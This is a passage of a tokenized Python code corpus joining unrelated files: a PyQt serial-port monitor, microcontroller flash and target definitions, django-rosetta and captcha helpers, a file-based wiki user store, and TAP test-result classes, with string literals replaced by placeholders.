create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , slot = self . OnStart , tip = "<STR_LIT>" ) <EOL> self . stop_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , slot = self . OnStop , tip = "<STR_LIT>" ) <EOL> exit_action = self . create_action ( "<STR_LIT>" , slot = self . close , <EOL> shortcut = "<STR_LIT>" , tip = "<STR_LIT>" ) <EOL> self . start_action . setEnabled ( False ) <EOL> self . stop_action . setEnabled ( False ) <EOL> self . add_actions ( self . file_menu , <EOL> ( selectport_action , self . start_action , self . stop_action , <EOL> None , exit_action ) ) <EOL> self . help_menu = self . menuBar ( ) . addMenu ( "<STR_LIT>" ) <EOL> about_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = '<STR_LIT>' , slot = self . on_about , <EOL> tip = '<STR_LIT>' ) <EOL> self . add_actions ( self . help_menu , ( about_action , ) ) <EOL> def set_actions_enable_state ( self ) : <EOL> if self . portname . text ( ) == '<STR_LIT>' : <EOL> start_enable = stop_enable = False <EOL> else : <EOL> start_enable = not self . monitor_active <EOL> stop_enable = self . monitor_active <EOL> self . start_action . setEnabled ( start_enable ) <EOL> self . stop_action . setEnabled ( stop_enable ) <EOL> def on_about ( self ) : <EOL> msg = __doc__ <EOL> QMessageBox . about ( self , "<STR_LIT>" , msg . strip ( ) ) <EOL> def on_select_port ( self ) : <EOL> ports = enumerate_serial_ports ( ) <EOL> if len ( ports ) == <NUM_LIT:0> : <EOL> QMessageBox . critical ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> return <EOL> item , ok = QInputDialog . getItem ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' , ports , <NUM_LIT:0> , False ) <EOL> if ok and not item . isEmpty ( ) : <EOL> self . portname . setText ( item ) <EOL> self . set_actions_enable_state ( ) <EOL> def fill_ports_combobox ( self ) : <EOL> """<STR_LIT>""" <EOL> vNbCombo = "<STR_LIT>" <EOL> self . Com_ComboBox . clear ( ) <EOL> self . AvailablePorts = enumerate_serial_ports ( ) <EOL> for value in self . AvailablePorts : <EOL> self . Com_ComboBox . addItem ( value ) <EOL> vNbCombo += value + "<STR_LIT>" <EOL> vNbCombo = vNbCombo [ : - <NUM_LIT:3> ] <EOL> debug ( ( "<STR_LIT>" % ( vNbCombo ) ) ) <EOL> def OnStart ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . radio19200 . isChecked ( ) : <EOL> self . baudrate = <NUM_LIT> <EOL> print "<STR_LIT>" <EOL> if self . radio9600 . isChecked ( ) : <EOL> self . baudrate = <NUM_LIT> <EOL> print "<STR_LIT>" <EOL> vNbCombo = self . Com_ComboBox . currentIndex ( ) <EOL> self . port = self . AvailablePorts [ vNbCombo ] <EOL> self . button_Connect . setEnabled ( False ) <EOL> self . button_Disconnect . setEnabled ( True ) <EOL> self . Com_ComboBox . setEnabled ( False ) <EOL> self . data_q = Queue . Queue ( ) <EOL> self . error_q = Queue . Queue ( ) <EOL> self . com_monitor = ComMonitorThread ( <EOL> self . data_q , <EOL> self . error_q , <EOL> self . port , <EOL> self . baudrate ) <EOL> self . com_monitor . start ( ) <EOL> com_error = get_item_from_queue ( self . error_q ) <EOL> if com_error is not None : <EOL> QMessageBox . critical ( self , '<STR_LIT>' , <EOL> com_error ) <EOL> self . com_monitor = None <EOL> self . monitor_active = True <EOL> self . connect ( self . timer , SIGNAL ( '<STR_LIT>' ) , self . on_timer ) <EOL> update_freq = self . updatespeed_knob . value ( ) <EOL> if update_freq > <NUM_LIT:0> : <EOL> self . timer . start ( <NUM_LIT> / update_freq ) <EOL> self . status_text . setText ( '<STR_LIT>' ) <EOL> debug ( '<STR_LIT>' ) <EOL> def OnStop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . com_monitor is not None : <EOL> self . com_monitor . join ( <NUM_LIT:1000> ) <EOL> self . com_monitor = None <EOL> self . monitor_active = False <EOL> self . button_Connect . setEnabled ( True ) <EOL> self . button_Disconnect . setEnabled ( False ) <EOL> self . Com_ComboBox . setEnabled ( True ) <EOL> self . timer . stop ( ) <EOL> self . status_text . setText ( '<STR_LIT>' ) <EOL> debug ( '<STR_LIT>' ) <EOL> def on_timer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . read_serial_data ( ) <EOL> self . update_monitor ( ) <EOL> def on_knob_change ( self ) : <EOL> """<STR_LIT>""" <EOL> update_freq = self . updatespeed_knob . value ( ) <EOL> self . knob_l . setText ( '<STR_LIT>' % self . updatespeed_knob . value ( ) ) <EOL> if self . timer . isActive ( ) : <EOL> update_freq = max ( <NUM_LIT> , update_freq ) <EOL> self . timer . setInterval ( <NUM_LIT> / update_freq ) <EOL> def update_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . livefeed . has_new_data : <EOL> data = self . livefeed . read_data ( ) <EOL> self . csvdata . append ( [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] ) <EOL> if len ( self . csvdata ) > self . max_spin . value ( ) : <EOL> f = open ( time . strftime ( "<STR_LIT>" ) + "<STR_LIT>" , '<STR_LIT>' ) <EOL> try : <EOL> writer = csv . writer ( f ) <EOL> for i in range ( self . max_spin . value ( ) ) : <EOL> writer . writerow ( self . csvdata [ i ] ) <EOL> print '<STR_LIT>' <EOL> finally : <EOL> f . close ( ) <EOL> self . csvdata = [ ] <EOL> self . g_samples [ <NUM_LIT:0> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:0> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:0> ] . pop ( <NUM_LIT:0> ) <EOL> self . g_samples [ <NUM_LIT:1> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:1> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:1> ] . pop ( <NUM_LIT:0> ) <EOL> self . g_samples [ <NUM_LIT:2> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:2> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:2> ] . pop ( <NUM_LIT:0> ) <EOL> tdata = [ s [ <NUM_LIT:0> ] for s in self . g_samples [ <NUM_LIT:2> ] ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> data [ i ] = [ s [ <NUM_LIT:1> ] for s in self . g_samples [ i ] ] <EOL> if self . gcurveOn [ i ] : <EOL> self . curve [ i ] . setData ( tdata , data [ i ] ) <EOL> """<STR_LIT>""" <EOL> self . plot . setAxisScale ( Qwt . QwtPlot . xBottom , tdata [ <NUM_LIT:0> ] , max ( <NUM_LIT:5> , tdata [ - <NUM_LIT:1> ] ) ) <EOL> self . plot . replot ( ) <EOL> def read_serial_data ( self ) : <EOL> """<STR_LIT>""" <EOL> qdata = list ( get_all_from_queue ( self . data_q ) ) <EOL> if len ( qdata ) > <NUM_LIT:0> : <EOL> data = dict ( timestamp = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] , <EOL> gx = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> gy = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> gz = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> ) <EOL> self . livefeed . add_data ( data ) <EOL> def add_actions ( self , target , actions ) : <EOL> for action in actions : <EOL> if action is None : <EOL> target . addSeparator ( ) <EOL> else : <EOL> target . addAction ( action ) <EOL> def create_action ( self , text , slot = None , shortcut = None , <EOL> icon = None , tip = None , checkable = False , <EOL> signal = "<STR_LIT>" ) : <EOL> action = QAction ( text , self ) <EOL> if icon is not None : <EOL> action . setIcon ( QIcon ( "<STR_LIT>" % icon ) ) <EOL> if shortcut is not None : <EOL> action . setShortcut ( shortcut ) <EOL> if tip is not None : <EOL> action . setToolTip ( tip ) <EOL> action . setStatusTip ( tip ) <EOL> if slot is not None : <EOL> self . connect ( action , SIGNAL ( signal ) , slot ) <EOL> if checkable : <EOL> action . setCheckable ( True ) <EOL> return action <EOL> def main ( ) : <EOL> app = QApplication ( sys . argv ) <EOL> form = PlottingDataMonitor ( ) <EOL> form . show ( ) <EOL> app . exec_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from flash import Flash <EOL> flash_algo = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False <EOL> } ; <EOL> class Flash_lpc11u24 ( Flash ) : <EOL> def __init__ ( self , target ) : <EOL> super ( Flash_lpc11u24 , self ) . __init__ ( target , flash_algo ) <EOL> def programPage ( self , flashPtr , bytes ) : <EOL> write_size = <NUM_LIT> <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:4> ) : <EOL> data = bytes [ i * write_size : ( i + <NUM_LIT:1> ) * write_size ] <EOL> Flash . programPage ( self , flashPtr + i * write_size , data ) </s>
<s> """<STR_LIT>""" <EOL> import cortex_m <EOL> import target_kinetis <EOL> import target_kl02z <EOL> import target_kl05z <EOL> import target_kl25z <EOL> import target_kl26z <EOL> import target_kl28z <EOL> import target_kl46z <EOL> import target_k22f <EOL> import target_k64f <EOL> import target_k20d50m <EOL> import target_lpc800 <EOL> import target_lpc11u24 <EOL> import target_lpc1768 <EOL> import target_lpc4330 <EOL> import target_nrf51 <EOL> import target_nrf52 <EOL> import target_stm32f103rc <EOL> import target_stm32f051 <EOL> import target_maxwsnenv <EOL> import target_max32600mbed <EOL> import target_w7500 <EOL> import target_lpc11xx_32 <EOL> import target_lpc824 <EOL> import semihost <EOL> TARGET = { <EOL> '<STR_LIT>' : cortex_m . CortexM , <EOL> '<STR_LIT>' : target_kinetis . Kinetis , <EOL> '<STR_LIT>' : target_kl02z . KL02Z , <EOL> '<STR_LIT>' : target_kl05z . KL05Z , <EOL> '<STR_LIT>' : target_kl25z . KL25Z , <EOL> '<STR_LIT>' : target_kl26z . KL26Z , <EOL> '<STR_LIT>' : target_kl28z . KL28x , <EOL> '<STR_LIT>' : target_kl46z . KL46Z , <EOL> '<STR_LIT>' : target_k20d50m . K20D50M , <EOL> '<STR_LIT>' : target_k22f . K22F , <EOL> '<STR_LIT>' : target_k64f . K64F , <EOL> '<STR_LIT>' : target_lpc800 . LPC800 , <EOL> '<STR_LIT>' : target_lpc11u24 . LPC11U24 , <EOL> '<STR_LIT>' : target_lpc1768 . LPC1768 , <EOL> '<STR_LIT>' : target_lpc4330 . LPC4330 , <EOL> '<STR_LIT>' : target_nrf51 . NRF51 , <EOL> '<STR_LIT>' : target_nrf52 . NRF52 , <EOL> '<STR_LIT>' : target_stm32f103rc . STM32F103RC , <EOL> '<STR_LIT>' : target_stm32f051 . STM32F051 , <EOL> '<STR_LIT>' : target_maxwsnenv . MAXWSNENV , <EOL> '<STR_LIT>' : target_max32600mbed . MAX32600MBED , <EOL> '<STR_LIT>' : target_w7500 . W7500 , <EOL> '<STR_LIT>' : target_lpc11xx_32 . LPC11XX_32 , <EOL> '<STR_LIT>' : target_lpc824 . LPC824 , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from cortex_m import CortexM <EOL> from . memory_map import ( FlashRegion , RamRegion , MemoryMap ) <EOL> import logging <EOL> DBGMCU_CR = <NUM_LIT> <EOL> DBGMCU_VAL = <NUM_LIT> <EOL> class STM32F103RC ( CortexM ) : <EOL> memoryMap = MemoryMap ( <EOL> FlashRegion ( start = <NUM_LIT> , length = <NUM_LIT> , blocksize = <NUM_LIT> , isBootMemory = True ) , <EOL> RamRegion ( start = <NUM_LIT> , length = <NUM_LIT> ) <EOL> ) <EOL> def __init__ ( self , link ) : <EOL> super ( STM32F103RC , self ) . __init__ ( link , self . memoryMap ) <EOL> def init ( self ) : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> CortexM . init ( self ) <EOL> self . writeMemory ( DBGMCU_CR , DBGMCU_VAL ) ; </s>
<s> from datetime import datetime <EOL> from django . conf import settings <EOL> from rosetta . conf import settings as rosetta_settings <EOL> import django <EOL> import os <EOL> import inspect <EOL> from django . apps import AppConfig <EOL> from django . apps import apps <EOL> from django . utils import timezone <EOL> try : <EOL> from django . core . cache import caches <EOL> cache = caches [ rosetta_settings . ROSETTA_CACHE_NAME ] <EOL> except ImportError : <EOL> from django . core . cache import get_cache <EOL> cache = get_cache ( rosetta_settings . ROSETTA_CACHE_NAME ) <EOL> def timestamp_with_timezone ( dt = None ) : <EOL> """<STR_LIT>""" <EOL> dt = dt or datetime . now ( ) <EOL> if timezone is None : <EOL> return dt . strftime ( '<STR_LIT>' ) <EOL> if not dt . tzinfo : <EOL> tz = timezone . get_current_timezone ( ) <EOL> if not tz : <EOL> tz = timezone . utc <EOL> dt = dt . replace ( tzinfo = timezone . get_current_timezone ( ) ) <EOL> return dt . strftime ( "<STR_LIT>" ) <EOL> def find_pos ( lang , project_apps = True , django_apps = False , third_party_apps = False ) : <EOL> """<STR_LIT>""" <EOL> paths = [ ] <EOL> parts = settings . SETTINGS_MODULE . split ( '<STR_LIT:.>' ) <EOL> project = __import__ ( parts [ <NUM_LIT:0> ] , { } , { } , [ ] ) <EOL> abs_project_path = os . path . normpath ( os . path . abspath ( os . path . dirname ( project . __file__ ) ) ) <EOL> if project_apps : <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT>' ) ) ) <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> if django_apps : <EOL> django_paths = cache . get ( '<STR_LIT>' ) <EOL> if django_paths is None : <EOL> django_paths = [ ] <EOL> for root , dirnames , filename in os . walk ( os . path . abspath ( os . path . dirname ( django . __file__ ) ) ) : <EOL> if '<STR_LIT>' in dirnames : <EOL> django_paths . append ( os . path . join ( root , '<STR_LIT>' ) ) <EOL> continue <EOL> cache . set ( '<STR_LIT>' , django_paths , <NUM_LIT> * <NUM_LIT> ) <EOL> paths = paths + django_paths <EOL> for localepath in settings . LOCALE_PATHS : <EOL> if os . path . isdir ( localepath ) : <EOL> paths . append ( localepath ) <EOL> has_appconfig = False <EOL> for appname in settings . INSTALLED_APPS : <EOL> if rosetta_settings . EXCLUDED_APPLICATIONS and appname in rosetta_settings . EXCLUDED_APPLICATIONS : <EOL> continue <EOL> p = appname . rfind ( '<STR_LIT:.>' ) <EOL> if p >= <NUM_LIT:0> : <EOL> app = getattr ( __import__ ( appname [ : p ] , { } , { } , [ str ( appname [ p + <NUM_LIT:1> : ] ) ] ) , appname [ p + <NUM_LIT:1> : ] ) <EOL> else : <EOL> app = __import__ ( appname , { } , { } , [ ] ) <EOL> if django . VERSION [ <NUM_LIT:0> : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:7> ) : <EOL> if inspect . isclass ( app ) and issubclass ( app , AppConfig ) : <EOL> has_appconfig = True <EOL> continue <EOL> app_path = os . path . normpath ( os . path . abspath ( os . path . join ( os . path . dirname ( app . __file__ ) , '<STR_LIT>' ) ) ) <EOL> if '<STR_LIT>' in app_path and '<STR_LIT>' in app_path and not django_apps : <EOL> continue <EOL> if not third_party_apps and abs_project_path not in app_path : <EOL> continue <EOL> if not project_apps and abs_project_path in app_path : <EOL> continue <EOL> if os . path . isdir ( app_path ) : <EOL> paths . append ( app_path ) <EOL> if has_appconfig : <EOL> for app_ in apps . get_app_configs ( ) : <EOL> if rosetta_settings . EXCLUDED_APPLICATIONS and app_ . name in rosetta_settings . EXCLUDED_APPLICATIONS : <EOL> continue <EOL> app_path = app_ . path <EOL> if '<STR_LIT>' in app_path and '<STR_LIT>' in app_path and not django_apps : <EOL> continue <EOL> if not third_party_apps and abs_project_path not in app_path : <EOL> continue <EOL> if not project_apps and abs_project_path in app_path : <EOL> continue <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT>' ) ) ) <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> ret = set ( ) <EOL> langs = [ lang , ] <EOL> if u'<STR_LIT:->' in lang : <EOL> _l , _c = map ( lambda x : x . lower ( ) , lang . split ( u'<STR_LIT:->' , <NUM_LIT:1> ) ) <EOL> langs += [ u'<STR_LIT>' % ( _l , _c ) , u'<STR_LIT>' % ( _l , _c . upper ( ) ) , u'<STR_LIT>' % ( _l , _c . capitalize ( ) ) , ] <EOL> elif u'<STR_LIT:_>' in lang : <EOL> _l , _c = map ( lambda x : x . lower ( ) , lang . split ( u'<STR_LIT:_>' , <NUM_LIT:1> ) ) <EOL> langs += [ u'<STR_LIT>' % ( _l , _c ) , u'<STR_LIT>' % ( _l , _c . upper ( ) ) , u'<STR_LIT>' % ( _l , _c . capitalize ( ) ) , ] <EOL> paths = map ( os . path . normpath , paths ) <EOL> paths = list ( set ( paths ) ) <EOL> for path in paths : <EOL> if path not in rosetta_settings . ROSETTA_EXCLUDED_PATHS : <EOL> for lang_ in langs : <EOL> dirname = os . path . join ( path , lang_ , '<STR_LIT>' ) <EOL> for fn in rosetta_settings . POFILENAMES : <EOL> filename = os . path . join ( dirname , fn ) <EOL> if os . path . isfile ( filename ) : <EOL> ret . add ( os . path . abspath ( filename ) ) <EOL> return list ( sorted ( ret ) ) <EOL> def pagination_range ( first , last , current ) : <EOL> r = [ ] <EOL> r . append ( first ) <EOL> if first + <NUM_LIT:1> < last : <EOL> r . append ( first + <NUM_LIT:1> ) <EOL> if current - <NUM_LIT:2> > first and current - <NUM_LIT:2> < last : <EOL> r . append ( current - <NUM_LIT:2> ) <EOL> if current - <NUM_LIT:1> > first and current - <NUM_LIT:1> < last : <EOL> r . append ( current - <NUM_LIT:1> ) <EOL> if current > first and current < last : <EOL> r . append ( current ) <EOL> if current + <NUM_LIT:1> < last and current + <NUM_LIT:1> > first : <EOL> r . append ( current + <NUM_LIT:1> ) <EOL> if current + <NUM_LIT:2> < last and current + <NUM_LIT:2> > first : <EOL> r . append ( current + <NUM_LIT:2> ) <EOL> if last - <NUM_LIT:1> > first : <EOL> r . append ( last - <NUM_LIT:1> ) <EOL> r . append ( last ) <EOL> r = list ( set ( r ) ) <EOL> r . sort ( ) <EOL> prev = <NUM_LIT> <EOL> for e in r [ : ] : <EOL> if prev + <NUM_LIT:1> < e : <EOL> try : <EOL> r . insert ( r . index ( e ) , '<STR_LIT>' ) <EOL> except ValueError : <EOL> pass <EOL> prev = e <EOL> return r </s>
<s> from django . conf . urls import url <EOL> from captcha import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . captcha_image , name = '<STR_LIT>' , kwargs = { '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> url ( r'<STR_LIT>' , views . captcha_image , name = '<STR_LIT>' , kwargs = { '<STR_LIT>' : <NUM_LIT:2> } ) , <EOL> url ( r'<STR_LIT>' , views . captcha_audio , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . captcha_refresh , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> import json <EOL> import hashlib <EOL> import os <EOL> from markwiki . exceptions import UserStorageError <EOL> from markwiki . models . user import User <EOL> from markwiki . storage . user import UserStorage <EOL> class FileUserStorage ( UserStorage ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , config ) : <EOL> self . _path = os . path . join ( config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . _id_index_file = os . path . join ( self . _path , '<STR_LIT>' ) <EOL> self . _id_index = { } <EOL> self . _email_index_file = os . path . join ( self . _path , '<STR_LIT>' ) <EOL> self . _email_index = { } <EOL> def initialize ( self ) : <EOL> if not os . path . exists ( self . _path ) : <EOL> os . mkdir ( self . _path ) <EOL> self . _write_json ( self . _id_index , self . _id_index_file ) <EOL> self . _write_json ( self . _email_index , self . _email_index_file ) <EOL> else : <EOL> self . _read_indices ( ) <EOL> def create ( self , user ) : <EOL> '''<STR_LIT>''' <EOL> user_file = self . _get_user_file ( user . name ) <EOL> if os . path . exists ( user_file ) : <EOL> raise UserStorageError ( '<STR_LIT>' ) <EOL> if self . find_by_email ( user . email ) is not None : <EOL> raise UserStorageError ( '<STR_LIT>' ) <EOL> user . user_id = self . _generate_user_id ( ) <EOL> self . _write_json ( user . __dict__ , user_file ) <EOL> self . _update_indices ( user , user_file ) <EOL> def find_by_email ( self , email ) : <EOL> '''<STR_LIT>''' <EOL> user_file = self . _email_index . get ( email ) <EOL> if user_file is None : <EOL> return None <EOL> return self . _load_user ( user_file ) <EOL> def find_by_id ( self , user_id ) : <EOL> '''<STR_LIT>''' <EOL> user_file = self . _id_index . get ( user_id ) <EOL> if user_file is None : <EOL> return None <EOL> return self . _load_user ( user_file ) <EOL> def find_by_name ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> user_file = self . _get_user_file ( name ) <EOL> return self . _load_user ( user_file ) <EOL> def update ( self , user ) : <EOL> '''<STR_LIT>''' <EOL> user_file = self . _get_user_file ( user . name ) <EOL> self . _write_json ( user . __dict__ , user_file ) <EOL> def _generate_user_id ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _read_indices ( ) <EOL> user_id = len ( self . _id_index ) <EOL> while self . find_by_id ( u'<STR_LIT>' . format ( user_id ) ) is not None : <EOL> user_id += <NUM_LIT:1> <EOL> return u'<STR_LIT>' . format ( user_id ) <EOL> def _get_user_file ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> m = hashlib . md5 ( ) <EOL> m . update ( name . encode ( '<STR_LIT:utf-8>' ) ) <EOL> return os . path . join ( self . _path , m . hexdigest ( ) ) <EOL> def _load_user ( self , user_file ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . exists ( user_file ) : <EOL> return None <EOL> with open ( user_file , '<STR_LIT:r>' ) as f : <EOL> data = json . loads ( f . read ( ) ) <EOL> return User ( data [ '<STR_LIT:name>' ] , data [ '<STR_LIT:email>' ] , data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) <EOL> def _read_indices ( self ) : <EOL> '''<STR_LIT>''' <EOL> with open ( self . _id_index_file , '<STR_LIT:r>' ) as f : <EOL> self . _id_index = json . loads ( f . read ( ) ) <EOL> with open ( self . _email_index_file , '<STR_LIT:r>' ) as f : <EOL> self . _email_index = json . loads ( f . read ( ) ) <EOL> def _update_indices ( self , user , user_file ) : <EOL> '''<STR_LIT>''' <EOL> self . _id_index [ user . user_id ] = user_file <EOL> self . _write_json ( self . _id_index , self . _id_index_file ) <EOL> if user . email : <EOL> self . _email_index [ user . email ] = user_file <EOL> self . _write_json ( self . _email_index , self . _email_index_file ) <EOL> def _write_json ( self , data , out ) : <EOL> '''<STR_LIT>''' <EOL> json_data = json . dumps ( data , sort_keys = True , indent = <NUM_LIT:2> , <EOL> separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) <EOL> with open ( out , '<STR_LIT:w>' ) as f : <EOL> f . write ( json_data ) </s>
<s> class Line ( object ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def category ( self ) : <EOL> raise NotImplementedError <EOL> class Result ( Line ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , ok , number = None , description = '<STR_LIT>' , directive = None , <EOL> diagnostics = None ) : <EOL> self . _ok = ok <EOL> if number : <EOL> self . _number = int ( number ) <EOL> else : <EOL> self . _number = None <EOL> self . _description = description <EOL> self . directive = directive <EOL> self . diagnostics = diagnostics <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:test>' <EOL> @ property <EOL> def ok ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _ok <EOL> @ property <EOL> def number ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _number <EOL> @ property <EOL> def description ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _description <EOL> @ property <EOL> def skip ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . directive . skip <EOL> @ property <EOL> def todo ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . directive . todo <EOL> def __str__ ( self ) : <EOL> is_not = '<STR_LIT>' <EOL> if not self . ok : <EOL> is_not = '<STR_LIT>' <EOL> directive = '<STR_LIT>' <EOL> if self . directive is not None : <EOL> directive = '<STR_LIT>' . format ( self . directive . text ) <EOL> diagnostics = '<STR_LIT>' <EOL> if self . diagnostics is not None : <EOL> diagnostics = '<STR_LIT:\n>' + self . diagnostics . rstrip ( ) <EOL> return "<STR_LIT>" . format ( <EOL> is_not , self . number , self . description , directive , diagnostics ) <EOL> class Plan ( Line ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expected_tests , directive = None ) : <EOL> self . _expected_tests = expected_tests <EOL> self . directive = directive <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def expected_tests ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _expected_tests <EOL> @ property <EOL> def skip ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . directive . skip <EOL> class Diagnostic ( Line ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text ) : <EOL> self . _text = text <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _text <EOL> class Bail ( Line ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reason ) : <EOL> self . _reason = reason <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def reason ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _reason <EOL> class Version ( Line ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , version ) : <EOL> self . _version = version <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:version>' <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _version <EOL> class Unknown ( Line ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def category ( self ) : <EOL> """<STR_LIT>""" <EOL> return 